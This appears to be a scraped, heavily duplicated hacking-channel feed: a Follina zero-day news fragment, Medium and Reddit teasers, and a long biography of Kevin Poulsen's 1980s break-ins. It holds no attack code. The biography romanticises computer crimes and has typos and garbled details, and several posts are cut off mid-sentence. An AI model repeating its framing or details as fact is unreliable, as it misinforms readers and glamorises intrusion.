Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Zero-Day ‘Follina’ Bug Lays Older Microsoft Office Versions Open to Attack Zero-Day ‘Follina’ Bug Lays Older Microsoft Office Versions Open to AttackPost Views: 53 Premium Content https://www.blackhatethicalhacking.com/wp-conte…
int query to Defender. Additionally, Warren suggests using the Attack Surface Reduction (ASR) rules to block the office applications from creating child processes.
See Also: The Difference between Vulnerability Assessment and Pentesting
Source: threatpost.com Source Linkhttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-1024x1024.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/evilgnomes-linux-malware-steals-audios-spy-on-linux-users-1-1-1024x688-1-90x90.jpg New Windows Subsystem for Linux malware steals browser auth cookies1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/shutterstock_176459972-90x90.jpg LinkedIn bug bounty program goes public with rewards of up to $18k4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/vmware-cloudnerve-90x90.jpg New ‘Cheers’ Linux ransomware targets VMware ESXi servers5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/mozilla-releases-fixes-for-firefox-thunderbird-vulnerabilities-exploited-during-pwn2own-vancouver-2022-hacking-contest-90x90.jpg Mozilla fixes Firefox, Thunderbird zero-days exploited at Pwn2Own6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/4x3_1600x1200_highres-Word_Snake_News-90x90.jpg Snake Keylogger Spreads Through Malicious PDFs1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/FTYM512XsAArcFs-90x90.jpg Malicious PyPI package opens backdoors on Windows, Linux, and Macs1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/WordPress_headpic-90x90.jpg Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/3e41-article-210226-vmware-body-text-90x90.jpg April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/iphone-low-power-hacking_068D000001681697-90x90.jpg iPhones Vulnerable to Attack Even When Turned Off2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/ezgif.com-gif-maker-90x90.jpg Apple emergency update fixes zero-day used to hack Macs, Watches2 weeks ago
The post Zero-Day ‘Follina’ Bug Lays Older Microsoft Office Versions Open to Attack first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
See Also: The Difference between Vulnerability Assessment and Pentesting
Source: threatpost.com Source Linkhttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-1024x1024.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/evilgnomes-linux-malware-steals-audios-spy-on-linux-users-1-1-1024x688-1-90x90.jpg New Windows Subsystem for Linux malware steals browser auth cookies1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/shutterstock_176459972-90x90.jpg LinkedIn bug bounty program goes public with rewards of up to $18k4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/vmware-cloudnerve-90x90.jpg New ‘Cheers’ Linux ransomware targets VMware ESXi servers5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/mozilla-releases-fixes-for-firefox-thunderbird-vulnerabilities-exploited-during-pwn2own-vancouver-2022-hacking-contest-90x90.jpg Mozilla fixes Firefox, Thunderbird zero-days exploited at Pwn2Own6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/4x3_1600x1200_highres-Word_Snake_News-90x90.jpg Snake Keylogger Spreads Through Malicious PDFs1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/FTYM512XsAArcFs-90x90.jpg Malicious PyPI package opens backdoors on Windows, Linux, and Macs1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/WordPress_headpic-90x90.jpg Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/3e41-article-210226-vmware-body-text-90x90.jpg April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/iphone-low-power-hacking_068D000001681697-90x90.jpg iPhones Vulnerable to Attack Even When Turned Off2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/ezgif.com-gif-maker-90x90.jpg Apple emergency update fixes zero-day used to hack Macs, Watches2 weeks ago
The post Zero-Day ‘Follina’ Bug Lays Older Microsoft Office Versions Open to Attack first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
LetsDefend.io SOC 104 — Malware Detected!
https://cdn-images-1.medium.com/max/1422/1*DKTayHwUkiiAFU5ATEjv4A.png
Today we’re going to analyze a case on LetsDefend.io platform which detects there has been malware on the network.
Continue reading on Medium »
LetsDefend.io SOC 104 — Malware Detected!
https://cdn-images-1.medium.com/max/1422/1*DKTayHwUkiiAFU5ATEjv4A.png
Today we’re going to analyze a case on LetsDefend.io platform which detects there has been malware on the network.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe Erlik Machine
https://cdn-images-1.medium.com/max/2600/0*TkrCWPbf75X7kd1e
Kale İleri Teknoloji olarak hazırlamış olduğumuz zafiyetli makineye https://tryhackme.com/jr/erlikmachine linki üzerinden ulaşabilirsiniz.
Continue reading on Medium »
TryHackMe Erlik Machine
https://cdn-images-1.medium.com/max/2600/0*TkrCWPbf75X7kd1e
Kale İleri Teknoloji olarak hazırlamış olduğumuz zafiyetli makineye https://tryhackme.com/jr/erlikmachine linki üzerinden ulaşabilirsiniz.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Top Ten Hacks and Breaches Of All Time
https://cdn-images-1.medium.com/max/600/0*M8DeZmlz-WvIMC3G
1. The TJX Companies, Inc. (2007)
Continue reading on Medium »
Top Ten Hacks and Breaches Of All Time
https://cdn-images-1.medium.com/max/600/0*M8DeZmlz-WvIMC3G
1. The TJX Companies, Inc. (2007)
Continue reading on Medium »
hacking: security in practice
Hacking/security risk while unsubscribing to spam emails
Problem statement : I get a lot of spam emails everyday like most people do. The email filters aren't perfect so sometimes even valid emails are sent to spam folder. If there are a lot of spam emails per day, then it can be difficult to find and retrieve these valid emails from the spam folder. Therefore I need to unsubscribe to reduce the daily count of junk emails.
Solution implemented : I have multiple devices so I use one device exclusively for high risk web access. So basically unsubscribing to junk emails, clicking on internet links that are not https or any accessing of websites that my anti-virus flags as a potentially compromised/risky domain. Username/password for these email accounts are filled using a password manager, anti-virus is installed, and the device functions in isolation ( not connected to data storage devices or home network).
In this environment, If I unsubscribe to spam emails by clicking on the unsubscribe link in that email, what level of risk is there?
submitted by /u/Ezqxll
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacking/security risk while unsubscribing to spam emails
Problem statement : I get a lot of spam emails everyday like most people do. The email filters aren't perfect so sometimes even valid emails are sent to spam folder. If there are a lot of spam emails per day, then it can be difficult to find and retrieve these valid emails from the spam folder. Therefore I need to unsubscribe to reduce the daily count of junk emails.
Solution implemented : I have multiple devices so I use one device exclusively for high risk web access. So basically unsubscribing to junk emails, clicking on internet links that are not https or any accessing of websites that my anti-virus flags as a potentially compromised/risky domain. Username/password for these email accounts are filled using a password manager, anti-virus is installed, and the device functions in isolation ( not connected to data storage devices or home network).
In this environment, If I unsubscribe to spam emails by clicking on the unsubscribe link in that email, what level of risk is there?
submitted by /u/Ezqxll
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hacking/security risk while unsubscribing to spam emails
Problem statement : I get a lot of spam emails everyday like most people do. The email filters aren't perfect so sometimes even valid emails are...
hacking: security in practice
Website or App for virtual hacking
Is there a website or app that I can use in order to try my tools on for example hacking a virtual network, website, system...
submitted by /u/FlikTik
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Website or App for virtual hacking
Is there a website or app that I can use in order to try my tools on for example hacking a virtual network, website, system...
submitted by /u/FlikTik
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Website or App for virtual hacking
Is there a website or app that I can use in order to try my tools on for example hacking a virtual network, website, system...
hacking: security in practice
security risks of using kali linux on baremetal?
URGENT...! I have planned to present a paper on "Security issues that arises on using kali linux on baremetal or host os" and hardening guidelines as my project for my college degree.
I have found a lot of resources for normal linux distros and server hardening but not anything specifically to kalilinux it would be really helpful to know some of the security issues you might have faced and also please suggest some hypothetical scenarios too so that i could look into them and add them on to my paper. I have to submit my final draft in a week so please help me guys...!
p.s: there are lot of paper on Red hat linux and other distros but i choose kali linux because there are very few articles available regarding this and I too use it for learning pen-testing and personally love it but lack knowledge and experience.
submitted by /u/ImaGoodGuy2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
security risks of using kali linux on baremetal?
URGENT...! I have planned to present a paper on "Security issues that arises on using kali linux on baremetal or host os" and hardening guidelines as my project for my college degree.
I have found a lot of resources for normal linux distros and server hardening but not anything specifically to kalilinux it would be really helpful to know some of the security issues you might have faced and also please suggest some hypothetical scenarios too so that i could look into them and add them on to my paper. I have to submit my final draft in a week so please help me guys...!
p.s: there are lot of paper on Red hat linux and other distros but i choose kali linux because there are very few articles available regarding this and I too use it for learning pen-testing and personally love it but lack knowledge and experience.
submitted by /u/ImaGoodGuy2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
security risks of using kali linux on baremetal?
URGENT...! I have planned to present a paper on "Security issues that arises on using kali linux on baremetal or host os" and hardening guidelines...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networks
Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networksPost Views: 45
Premium Content https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Patreon-3.png Subscribe to Patreon to watch this episode.
Reading Time: 8 Minutes
Kevin Poulsen, aka Dark Dante, hacked ARPANET’s network, dig deep into the giant switching networks of Pacific Bell, exploring and exploiting every element he could on his way. From the common systems responsible for the telephone services to the shadow systems that guard of national security.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/ezgif.com-gif-maker-1.jpg
Kevin Poulsen – Wired
Early life
Kevin Lee Poulsen was born in Pasadena, a suburb of North Hollywood, in California, on November 30, 1965
He was described by his friends as a shy kid with great potential. Kevin had little contact with his adoptive father and stepmother. They were in their late 40s, with no experience in networks or computers, and Kevin was interested in things that were completely beyond them as they were a farming couple.
On his sixteenth birthday, they bought him his first-ever computer, a TRS-80, but they knew nothing about what he was doing with it.
Just like any gifted kid of his generation, at the age of 13, Kevin was looking for human interaction through the telephone. On the jammed phone-chat lines of the late 70s, he met Sean Randol, a teenage girl with whom their interests aligned. They spoke about their favorite books, and other mutual interests they had as they were the same age, and eventually met in person.
Over the years they would talk for hours on the phone, and met at phone-chat parties with others (yes it was a thing in the 70s).
A lot of chatters were serious “phone phreaks”, who were hacking the telephone lines to chat for free.
See Also: Complete Offensive Security and Ethical Hacking Course
First steps into hacking
The school wasn’t nearly exciting for Kevin, he didn’t like going, so he decided changed schools. He went to the Valley Alternative Magnet in Van Nuys, where they encouraged kids to make their “own decisions” and he often choose to spend his school days playing video games.
The year is 1983, and Kevin, whose hacker alias was “Dark Dante”, had been already hacking, and phone-phreaking for a couple of years with his internet friends.
Kevin met Ronald Austin at a phone-chat party and they went on to spend time together. Austin was two years older than Kevin, living in Santa Monica and he was far better educated as he had just finished his first quarter as a physics major at UCLA.
Austin was new to the scene of hacking and phone-phreaking. He followed the steps of Kevin and in a couple of months, he was hacking by himself.
Hacking ARPANET’s network
The two of them were equipped with modems and cheap computers and went on to penetrate the ARPANET’s networks for fun. ARPANET,
was a computer network that linked universities with computers across the country by telephone lines, and it was funded by Pentagon.
In the summer of 1983, Kevin was 17, and Austin was 19. They became obsessed with computer dogfights on ARPANET and they soon began breaking-in networks. In August, the two friends breached several computers on many networks around the country.
Computers were breached at the Stanford Research Institute, a Bay Area think tank that works on classified military projects. There were also multiple break-ins at two East Coast defense contractors plants, two California research firms, the Naval Research Laboratory in Washington, D.C., and several Universities. https://www.b[...]
___________________________
@hacking_Attack
@Hacking_Video
Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networks
Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networksPost Views: 45
Premium Content https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Patreon-3.png Subscribe to Patreon to watch this episode.
Reading Time: 8 Minutes
Kevin Poulsen, aka Dark Dante, hacked ARPANET’s network, dig deep into the giant switching networks of Pacific Bell, exploring and exploiting every element he could on his way. From the common systems responsible for the telephone services to the shadow systems that guard of national security.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/ezgif.com-gif-maker-1.jpg
Kevin Poulsen – Wired
Early life
Kevin Lee Poulsen was born in Pasadena, a suburb of North Hollywood, in California, on November 30, 1965
He was described by his friends as a shy kid with great potential. Kevin had little contact with his adoptive father and stepmother. They were in their late 40s, with no experience in networks or computers, and Kevin was interested in things that were completely beyond them as they were a farming couple.
On his sixteenth birthday, they bought him his first-ever computer, a TRS-80, but they knew nothing about what he was doing with it.
Just like any gifted kid of his generation, at the age of 13, Kevin was looking for human interaction through the telephone. On the jammed phone-chat lines of the late 70s, he met Sean Randol, a teenage girl with whom their interests aligned. They spoke about their favorite books, and other mutual interests they had as they were the same age, and eventually met in person.
Over the years they would talk for hours on the phone, and met at phone-chat parties with others (yes it was a thing in the 70s).
A lot of chatters were serious “phone phreaks”, who were hacking the telephone lines to chat for free.
See Also: Complete Offensive Security and Ethical Hacking Course
First steps into hacking
The school wasn’t nearly exciting for Kevin, he didn’t like going, so he decided changed schools. He went to the Valley Alternative Magnet in Van Nuys, where they encouraged kids to make their “own decisions” and he often choose to spend his school days playing video games.
The year is 1983, and Kevin, whose hacker alias was “Dark Dante”, had been already hacking, and phone-phreaking for a couple of years with his internet friends.
Kevin met Ronald Austin at a phone-chat party and they went on to spend time together. Austin was two years older than Kevin, living in Santa Monica and he was far better educated as he had just finished his first quarter as a physics major at UCLA.
Austin was new to the scene of hacking and phone-phreaking. He followed the steps of Kevin and in a couple of months, he was hacking by himself.
Hacking ARPANET’s network
The two of them were equipped with modems and cheap computers and went on to penetrate the ARPANET’s networks for fun. ARPANET,
was a computer network that linked universities with computers across the country by telephone lines, and it was funded by Pentagon.
In the summer of 1983, Kevin was 17, and Austin was 19. They became obsessed with computer dogfights on ARPANET and they soon began breaking-in networks. In August, the two friends breached several computers on many networks around the country.
Computers were breached at the Stanford Research Institute, a Bay Area think tank that works on classified military projects. There were also multiple break-ins at two East Coast defense contractors plants, two California research firms, the Naval Research Laboratory in Washington, D.C., and several Universities. https://www.b[...]
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Ethical Hacking
Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networks | Black Hat Ethical Hacking
Kevin Poulsen, aka Dark Dante, hacked ARPANET’s network, dig deep into the giant switching networks of Pacific Bell, exploring and exploiting every element he could on his way.
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networks Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networksPost Views: 45 Premium Content https://www.blackhatethicalhacking.com/wp…
lackhatethicalhacking.com/wp-content/uploads/2022/03/Solutions-1.png See Also: Recon Tool: Dorks collections list First Arrest
On the morning of September 22, 1983, the FBI, investigators from the district attorney’s office, and UCLA campus cops pulled up on 2nd Street in Santa Monica, their suspect? A six-foot-tall white male.
The six-foot-tall white male was Austin, he was thrown in jail and charged with 14 counts of “malicious access to networks”. He was convicted on several counts and servers less than two months in custody.
At the same time, Kevin’s house in North Hollywood was swarmed by a fleet of cops and investigators. Kevin was lucky because he was a juvenile, and he was never brought up on criminal charges.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/ezgif.com-gif-maker-3.jpg
Kevin Poulsen first arrest, mugshot.
New Chapter
After the hacking incidents, The Stanford Research Institute hired Kevin to teach their military officials how to secure their networks with a hefty yearly salary.
He served in the department where it was responsible for security codes that protect communications between RSI and the military.
He went from an underground hacker to a government hacker, where he could hack and receive a paycheck for his efforts.
Short-lived government hacker dream
Kevin was living his dream as he was paying to hack but all fell apart in early 1988. Due to an unpaid rent bill for a storage facility nearby, the owner of the facility entered the locker and soon call the police. The detective found locksmith tools, false ID blanks, and birth certificates and went on to compile a detailed inventory. There were several boxed of gadgets and gizmos, phone company manuals, tools, lock picks, etc.
As they were compiling the inventory, the detectives found pictures of a young man trying to pick the lock of a telephone company trailer, the man in the photos was Kevin.
In February 1988, Kevin was called for interrogation at the Menlo Park police station. The detective let Kevin know about the issued warrant on his name, which included: driving without a license, birth certificates, social security numbers, and addresses that were found in the storage facility.
Kevin said that the stuff found there was “free” to collect from the trash bins, a technique known as “dumpster diving”, where hackers in the 80s and 90s would search the trash bins outside of major corporations to find potentially valuable information.
As the interrogation went on, Kevin seemed to have answers for every question, It was not illegal to do “dumpster diving” so he thought he was covered until the detective brought up the 1983 case when Austin was arrested and Kevin was not charged.
Kevin insisted that he wasn’t continuing those activities anymore and that his computer was only using it for fun and not for computer crimes, leaving Kevin free to live.
See Also: Darkside hacker group, the group that provides ransomware as a service FBI agents determined that the acts he was involved in had escalated as they continued their investigation and found evidence that he had penetrated US government computers, and transferred the passwords of that computers to others.
Investigators found that over the last year, someone matching his description had illegally entered several northern California telephone facilities using a false ID.
Kevin, once inside one of the Pacific bell offices (telephone company), he found telephone numbers he could use to get inside the phone company’s computer system.
He also stole the equipment found in the storage facility, which included manuals, switching equipment, etc.
Unsolved Mysteries
On Oct. 10, 1990, the NBC show aired an episode of the show called “Unsolved Mysteries”.
The episode was about Kevin’s criminal activities, the attacks on the Pacific Bell telephone lines, stealing military secrets, and even posing him as a national threat. They also included photos of Kevin as he was on the top wanted list of the[...]
___________________________
@hacking_Attack
@Hacking_Video
On the morning of September 22, 1983, the FBI, investigators from the district attorney’s office, and UCLA campus cops pulled up on 2nd Street in Santa Monica, their suspect? A six-foot-tall white male.
The six-foot-tall white male was Austin, he was thrown in jail and charged with 14 counts of “malicious access to networks”. He was convicted on several counts and servers less than two months in custody.
At the same time, Kevin’s house in North Hollywood was swarmed by a fleet of cops and investigators. Kevin was lucky because he was a juvenile, and he was never brought up on criminal charges.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/ezgif.com-gif-maker-3.jpg
Kevin Poulsen first arrest, mugshot.
New Chapter
After the hacking incidents, The Stanford Research Institute hired Kevin to teach their military officials how to secure their networks with a hefty yearly salary.
He served in the department where it was responsible for security codes that protect communications between RSI and the military.
He went from an underground hacker to a government hacker, where he could hack and receive a paycheck for his efforts.
Short-lived government hacker dream
Kevin was living his dream as he was paying to hack but all fell apart in early 1988. Due to an unpaid rent bill for a storage facility nearby, the owner of the facility entered the locker and soon call the police. The detective found locksmith tools, false ID blanks, and birth certificates and went on to compile a detailed inventory. There were several boxed of gadgets and gizmos, phone company manuals, tools, lock picks, etc.
As they were compiling the inventory, the detectives found pictures of a young man trying to pick the lock of a telephone company trailer, the man in the photos was Kevin.
In February 1988, Kevin was called for interrogation at the Menlo Park police station. The detective let Kevin know about the issued warrant on his name, which included: driving without a license, birth certificates, social security numbers, and addresses that were found in the storage facility.
Kevin said that the stuff found there was “free” to collect from the trash bins, a technique known as “dumpster diving”, where hackers in the 80s and 90s would search the trash bins outside of major corporations to find potentially valuable information.
As the interrogation went on, Kevin seemed to have answers for every question, It was not illegal to do “dumpster diving” so he thought he was covered until the detective brought up the 1983 case when Austin was arrested and Kevin was not charged.
Kevin insisted that he wasn’t continuing those activities anymore and that his computer was only using it for fun and not for computer crimes, leaving Kevin free to live.
See Also: Darkside hacker group, the group that provides ransomware as a service FBI agents determined that the acts he was involved in had escalated as they continued their investigation and found evidence that he had penetrated US government computers, and transferred the passwords of that computers to others.
Investigators found that over the last year, someone matching his description had illegally entered several northern California telephone facilities using a false ID.
Kevin, once inside one of the Pacific bell offices (telephone company), he found telephone numbers he could use to get inside the phone company’s computer system.
He also stole the equipment found in the storage facility, which included manuals, switching equipment, etc.
Unsolved Mysteries
On Oct. 10, 1990, the NBC show aired an episode of the show called “Unsolved Mysteries”.
The episode was about Kevin’s criminal activities, the attacks on the Pacific Bell telephone lines, stealing military secrets, and even posing him as a national threat. They also included photos of Kevin as he was on the top wanted list of the[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
lackhatethicalhacking.com/wp-content/uploads/2022/03/Solutions-1.png See Also: Recon Tool: Dorks collections list First Arrest On the morning of September 22, 1983, the FBI, investigators from the district attorney’s office, and UCLA campus cops pulled up…
FBI.
The episode ended with a photo of Kevin and the host giving information provided by the FBI for his whereabouts. The host reported that Kevin was allegedly living in the Los Angeles area and driving a late 70s white van.
Kevin was already hiding for 17 months, he narrowly escaped one time when he was picked up for a minor case and released without checking for federal warrants.
Kevin’s raids on government and Pacific Bell computers were part of his continuing search for identity, the dark side of “Dark Dante”. His dark side left him with only one choice, to run and hide from the FBI.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/unsovled-mysteries.png
Kevin Poulsen, as shown in the NBC series “Unsolved Mysteries”.
Hacking indictments, charges, jail time
After year-long hiding from the FBI, Kevin run out of luck. The FBI got a tip that he had been seen at the Hughes market in a neighborhood in LA. The FBI agents dropped some photos of Poulsen for employees of the market and were ready to catch him.
On April 10, 1991, the manager of the market saw a man with punk blond hair (Kevin dyed his hair to change his appearance) that seemed to be the guy that the FBI was looking for, but Kevin left by the time that the FBI agents arrived.
A couple of days later Kevin visited the market again, but this time the security guards with the employees weren’t going to leave anything to chance, couple of clerks grabbed him and wrestled him to the ground until the FBI arrived and arrested him.
The fun was coming to an end. The friendships he had formed during his hacking days were falling apart. Four former hackers agreed to testify against Kevin in return for reduced sentences.
After a two-year investigation, On the 21 of April 1993, the jury of Los Angeles delivered a 19-court indictment. The charges were for conspiracy, computer fraud, wiretapping, embezzlement, and theft of public property and records.
The San Jose federal grand jury returned a sealed indictment against Kevin for penetrating military and phone company computer systems in November 1989.
The San Jose indictment began by highlighting the tools used by Kevin and his alleged co-conspirators. Then, they highlighted the burglaries when Kevin broke into a Contra Costa County Pacific bell office in November 1986, and in February 1987, when he struck a larger target, the Pacific Bell’s main office when he stole company ID badges.
Then, a more serious accusation for Kevin was made as he was charged for hacking Pacific Bell computers in September 1987, as he obtained unpublished telephone numbers for the Soviet Consulate in San Francisco. He also found access codes for the US Army, investigations for exiled leaders by the FBI, and plans relating to a secret Army exercise.
Kevin could face up to a maximum of 100 years in prison and fines of nearly 5 million US dollars.
In June 1994, as he was already held without bail at Alameda County’s Jail, spending more than two years in custody, Kevin pleaded guilty to seven counts of conspiracy, fraud, and intercepting wire communications.
In April 1995, four years after his arrest, he was sentenced to 51 months in federal prison and fined 56 thousand US dollars. It was the longest sentence ever given to a hacker at the time.
He was released in July 1996, and he was ordered not to use a computer or the Internet for the next three years.
Life after Dark Dante
After his release, Kevin reinvented himself and stayed away from the “Dark Dante’s” illegal past.
In the early 2000s, he became a successful journalist, covering security and hacking news.
In 2005, he joined Wired as a senior editor and hosted his blog, “Threat Level”. In 2006, he released information detailing his successful search for registered sex offenders using Myspace to solicit sex from children. The FBI managed to identify 750 registered people with Myspace profiles and arrest one.
On 15 May 2013, Kevin launched the first-ever instance of a platform[...]
___________________________
@hacking_Attack
@Hacking_Video
The episode ended with a photo of Kevin and the host giving information provided by the FBI for his whereabouts. The host reported that Kevin was allegedly living in the Los Angeles area and driving a late 70s white van.
Kevin was already hiding for 17 months, he narrowly escaped one time when he was picked up for a minor case and released without checking for federal warrants.
Kevin’s raids on government and Pacific Bell computers were part of his continuing search for identity, the dark side of “Dark Dante”. His dark side left him with only one choice, to run and hide from the FBI.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/unsovled-mysteries.png
Kevin Poulsen, as shown in the NBC series “Unsolved Mysteries”.
Hacking indictments, charges, jail time
After year-long hiding from the FBI, Kevin run out of luck. The FBI got a tip that he had been seen at the Hughes market in a neighborhood in LA. The FBI agents dropped some photos of Poulsen for employees of the market and were ready to catch him.
On April 10, 1991, the manager of the market saw a man with punk blond hair (Kevin dyed his hair to change his appearance) that seemed to be the guy that the FBI was looking for, but Kevin left by the time that the FBI agents arrived.
A couple of days later Kevin visited the market again, but this time the security guards with the employees weren’t going to leave anything to chance, couple of clerks grabbed him and wrestled him to the ground until the FBI arrived and arrested him.
The fun was coming to an end. The friendships he had formed during his hacking days were falling apart. Four former hackers agreed to testify against Kevin in return for reduced sentences.
After a two-year investigation, On the 21 of April 1993, the jury of Los Angeles delivered a 19-court indictment. The charges were for conspiracy, computer fraud, wiretapping, embezzlement, and theft of public property and records.
The San Jose federal grand jury returned a sealed indictment against Kevin for penetrating military and phone company computer systems in November 1989.
The San Jose indictment began by highlighting the tools used by Kevin and his alleged co-conspirators. Then, they highlighted the burglaries when Kevin broke into a Contra Costa County Pacific bell office in November 1986, and in February 1987, when he struck a larger target, the Pacific Bell’s main office when he stole company ID badges.
Then, a more serious accusation for Kevin was made as he was charged for hacking Pacific Bell computers in September 1987, as he obtained unpublished telephone numbers for the Soviet Consulate in San Francisco. He also found access codes for the US Army, investigations for exiled leaders by the FBI, and plans relating to a secret Army exercise.
Kevin could face up to a maximum of 100 years in prison and fines of nearly 5 million US dollars.
In June 1994, as he was already held without bail at Alameda County’s Jail, spending more than two years in custody, Kevin pleaded guilty to seven counts of conspiracy, fraud, and intercepting wire communications.
In April 1995, four years after his arrest, he was sentenced to 51 months in federal prison and fined 56 thousand US dollars. It was the longest sentence ever given to a hacker at the time.
He was released in July 1996, and he was ordered not to use a computer or the Internet for the next three years.
Life after Dark Dante
After his release, Kevin reinvented himself and stayed away from the “Dark Dante’s” illegal past.
In the early 2000s, he became a successful journalist, covering security and hacking news.
In 2005, he joined Wired as a senior editor and hosted his blog, “Threat Level”. In 2006, he released information detailing his successful search for registered sex offenders using Myspace to solicit sex from children. The FBI managed to identify 750 registered people with Myspace profiles and arrest one.
On 15 May 2013, Kevin launched the first-ever instance of a platform[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
FBI. The episode ended with a photo of Kevin and the host giving information provided by the FBI for his whereabouts. The host reported that Kevin was allegedly living in the Los Angeles area and driving a late 70s white van. Kevin was already hiding for…
named SecureDrop, which was designed by him, Aaron Swartz, and James Dolan. SecureDrop is an open-source software platform for secure communication between journalists and sources.
Last words
Born in a time when hacking was an innocent act of youth when the laws were as unclear as to the boundaries of the ARPANET, Kevin had outlived his era.
He started with a TRS-80 computer, armed only with his curiosity and skill, he managed to shake up the world and expose the leaky security of the ARPANET network. Through his actions, the security of those networks was improved dramatically over the next years and paved the way for future network security.
Kevin is one of many hackers who reinvented themselves and help the cyber security space to become more robust with his skills, vision, and pragmatic approach to secure communication.
References:
⦿ The Last Hacker : He Called Himself Dark Dante. – Wired ⦿ Kevin Poulsen – Fantom Wiki ⦿ 10 MOST INSANE HACKING STORIES—EVER!
⦿ Kevin Poulsen Wikipedia https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-1024x1024.png Recent Articles* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/05/The-Difference-between-Vulnerability-Assessment-and-Pentesting.-90x90.png The Difference between Vulnerability Assessment and Pentesting4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Find-hidden-and-encrypted-secrets-from-any-website-90x90.png Write up: Find hidden and encrypted secrets from any website4 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Darkside-hacker-group-90x90.png Darkside hacker group, the group that provides ransomware as a service1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/How-to-schedule-tasks-the-right-way-in-Linux-using-crontab-90x90.png Write up: How to schedule tasks the right way in Linux, using crontab1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/04/Hacking-is-an-art-and-so-is-subdomain-enumeration-90x90.png Write up: Hacking is an art, and so is subdomain enumeration.2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Articles_Gallery-90x90.png Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees.2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Hide-data-in-images-and-extract-them-90x90.png Write up: Steganography: Hide data in images and extract them3 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/MafiaBoy-the-hacker-who-took-down-the-Internet-90x90.png Hacking stories: MafiaBoy, the hacker who took down the Internet3 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Detect-malicious-hacker-activities-on-endpoints-90x90.png Write up: Detect malicious hacker activities on endpoints3 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/Articles_Gallery-90x90.png How ILOVEYOU worm became the first global computer virus pandemic4 months ago
The post Kevin Poulsen, aka Dark Dante, and his hacking activities on ARPANET’s networks first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Last words
Born in a time when hacking was an innocent act of youth when the laws were as unclear as to the boundaries of the ARPANET, Kevin had outlived his era.
